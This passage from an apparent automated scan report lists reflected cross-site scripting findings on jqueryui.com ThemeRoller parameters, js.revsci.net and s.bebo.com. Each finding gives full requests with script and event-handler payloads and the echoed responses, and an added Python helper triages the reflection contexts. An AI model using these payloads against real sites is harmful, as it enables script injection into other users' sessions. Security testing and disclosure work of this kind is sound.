Shadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545df23d"><script>alert(1)</script>420d9ca6e8e&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png
...[SNIP]...

2.78. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab231"><script>alert(1)</script>a044bec90e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ab231"><script>alert(1)</script>a044bec90e3=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117123

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ab231"><script>alert(1)</script>a044bec90e3=1" type="text/css" media="all" />
...[SNIP]...

2.79. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b491a"><script>alert(1)</script>6437ba3b123 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxb491a"><script>alert(1)</script>6437ba3b123&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxb491a"><script>alert(1)</script>6437ba3b123&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.80. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c65d"><script>alert(1)</script>1ac0e87e35d was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px7c65d"><script>alert(1)</script>1ac0e87e35d&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px7c65d"><script>alert(1)</script>1ac0e87e35d&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.81. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d9b9"><script>alert(1)</script>4b8fea3533e was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d9b9"><script>alert(1)</script>4b8fea3533e&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
xtureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d9b9"><script>alert(1)</script>4b8fea3533e&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

2.82. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911fc"><script>alert(1)</script>3c6b3b13c15 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30911fc"><script>alert(1)</script>3c6b3b13c15&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30911fc"><script>alert(1)</script>3c6b3b13c15&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.83. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1d78"><script>alert(1)</script>e9417ff18c was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb1d78"><script>alert(1)</script>e9417ff18c&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb1d78"><script>alert(1)</script>e9417ff18c&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.84. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the body of the response. The payload 6da49<script>alert(1)</script>f1f0690e9f was submitted in the csid parameter. As the response below shows, the input was echoed converted to upper case, inside a JavaScript block comment, in a body served as application/javascript rather than as HTML.

Because the response carries Content-Type: application/javascript and the reflection lands inside a /* ... */ comment, a browser that honours the declared type will not parse this body as HTML, so the injected <script> tag does not execute when the URL is loaded directly. The case conversion also shows the parameter is normalised before it is echoed. Treat this as a confirmed reflection that needs manual review, not as a working proof of concept.

Request

GET /gateway/gw.js?csid=K087846da49<script>alert(1)</script>f1f0690e9f HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=...[SNIP]...; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=...[SNIP]...; rsiPus_TE1N="...[SNIP]..."; rsi_us_1000000="...[SNIP]..."

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 06 Jul 2011 14:00:48 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 07 Jul 2011 14:00:48 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:00:47 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "K087846DA49<SCRIPT>ALERT(1)</SCRIPT>F1F0690E9F" was not recognized.
*/
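Each "Issue detail" paragraph above records three things: whether the marker came back unmodified, which syntactic context it landed in (a double-quoted attribute for the ThemeRoller findings, a JavaScript comment in a non-HTML body for revsci.net, and single-quoted attributes, text nodes and JavaScript strings in the bebo.com findings that follow), and whether that is enough to execute script. The Python block below is an added example, not part of the original scan report or of any of the scanned sites, that reproduces that triage offline so a reader can check a finding by hand. The sample responses are constructed here and modelled on the snippets in this report; the helper names are this example's own.

```python
import html
import re

HTML_TYPES = {"text/html", "application/xhtml+xml"}
JS_TYPES = {"application/javascript", "text/javascript", "application/x-javascript"}


def media_type(headers):
    """Bare media type from Content-Type, e.g. 'application/javascript'."""
    return headers.get("Content-Type", "").split(";")[0].strip().lower()


def locate(body, payload):
    """Find the reflection: (index, echoed text, how it was transformed)."""
    i = body.find(payload)
    if i >= 0:
        return i, payload, "unmodified"
    m = re.search(re.escape(payload), body, re.IGNORECASE)
    if m:                                   # revsci.net upper-cases csid before echoing it
        return m.start(), m.group(0), "case-changed"
    encoded = html.escape(payload, quote=True)
    i = body.find(encoded)
    if i >= 0:                              # output encoding is in place
        return i, encoded, "html-encoded"
    return -1, "", "absent"


def js_context(src):
    """Context of a reflection inside the JavaScript source that precedes it."""
    if src.rfind("/*") > src.rfind("*/"):
        return "js-comment"
    # An odd number of unescaped quotes before the reflection means an open string literal.
    for quote, name in (("'", "js-string-single"), ('"', "js-string-double")):
        if len(re.findall(r"(?<!\\)" + quote, src)) % 2 == 1:
            return name
    return "js-code"


def html_context(before):
    """Context of a reflection inside the HTML markup that precedes it."""
    if before.rfind("<") > before.rfind(">"):                      # inside a tag
        tag = before[before.rfind("<"):]
        attrs = list(re.finditer(r"""=\s*(["'])""", tag))
        if attrs and tag[attrs[-1].end():].count(attrs[-1].group(1)) % 2 == 0:
            return "attr-double" if attrs[-1].group(1) == '"' else "attr-single"
        return "tag-unquoted"
    return "text"


# Character sequence the echoed text must contain to leave each context.
BREAKOUT = {"attr-double": '"', "attr-single": "'", "text": "<", "tag-unquoted": " ",
            "js-string-single": "'", "js-string-double": '"', "js-comment": "*/", "js-code": ""}


def classify(headers, body, payload):
    idx, echoed, how = locate(body, payload)
    if idx < 0:
        return {"echo": how, "context": None, "breaks_out": False,
                "html_capable": False, "verdict": "not reflected"}
    mtype, before = media_type(headers), body[:idx]
    lower = before.lower()
    if mtype in JS_TYPES:
        ctx = js_context(before)
    elif lower.rfind("<script") > lower.rfind("</script"):        # inside an inline script
        ctx = js_context(before[before.find(">", lower.rfind("<script")) + 1:])
    else:
        ctx = html_context(before)
    breaks_out = bool(BREAKOUT[ctx]) and BREAKOUT[ctx] in echoed
    html_capable = mtype in HTML_TYPES
    if not html_capable:
        verdict = "reflected outside an HTML document: not a direct XSS, review by hand"
    elif not breaks_out:
        verdict = "reflected but confined to its context"
    elif ctx.startswith("js-"):
        verdict = "terminates the JavaScript construct: script injection"
    elif "<" in echoed and ">" in echoed:
        verdict = "leaves its context and injects a tag: XSS confirmed"
    else:
        verdict = "leaves its context: attribute or tag injection possible"
    return {"echo": how, "context": ctx, "breaks_out": breaks_out,
            "html_capable": html_capable, "verdict": verdict}


# Constructed sample responses (headers, body, payload), modelled on snippets in this report.
SAMPLES = {
    "themeroller-2.78": ({"Content-Type": "text/html"},
        '<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&'
        'ab231"><script>alert(1)</script>a044bec90e3=1" type="text/css" media="all" />',
        'ab231"><script>alert(1)</script>a044bec90e3'),
    "revsci-2.84": ({"Content-Type": "application/javascript;charset=ISO-8859-1"},
        '/*\n* JavaScript include error:\n* The customer code '
        '"K087846DA49<SCRIPT>ALERT(1)</SCRIPT>F1F0690E9F" was not recognized.\n*/',
        '6da49<script>alert(1)</script>f1f0690e9f'),
    "single-quoted-attr": ({"Content-Type": "text/html; charset=UTF-8"},
        "<a href='/SwitchLanguage.jsp?Page=c/Site292f7'><script>alert(1)</script>55c886dab8f&Lang=nl'>",
        "292f7'><script>alert(1)</script>55c886dab8f"),
    "text-between-tags": ({"Content-Type": "text/html; charset=UTF-8"},
        '<div class="mod">ERROR 404: no /c/Site18ffc<script>alert(1)</script>491fb71b12c page</div>',
        '18ffc<script>alert(1)</script>491fb71b12c'),
    "js-string": ({"Content-Type": "text/html; charset=UTF-8"},
        "<script type=\"text/javascript\">var trackingPath = '/_/Site5d56a';4e37d154695/'+elemIdent;</script>",
        "5d56a';4e37d154695"),
    "encoded-output": ({"Content-Type": "text/html"},
        '<input value="ab231&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;a044bec90e3">',
        'ab231"><script>alert(1)</script>a044bec90e3'),
}


def run_all():
    return {name: classify(h, body, payload) for name, (h, body, payload) in SAMPLES.items()}


if __name__ == "__main__":
    for name, r in run_all().items():
        print(f"{name:20} {r['echo']:13} {str(r['context']):17} {r['verdict']}")
```

The two checks the scanner's one-line verdict hides are the media type and the transformation: a marker that is reflected only inside an application/javascript body, or only after case-folding or HTML encoding, is not the same finding as the ThemeRoller attribute break-out, and the classifier reports them separately so the severity can be set by hand.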

2.85. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef1cd"><img%20src%3da%20onerror%3dalert(1)>e91147b2c03 was submitted in the REST URL parameter 2. This input was echoed as ef1cd"><img src=a onerror=alert(1)>e91147b2c03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/Siteef1cd"><img%20src%3da%20onerror%3dalert(1)>e91147b2c03/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14777
Date: Wed, 06 Jul 2011 11:22:11 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
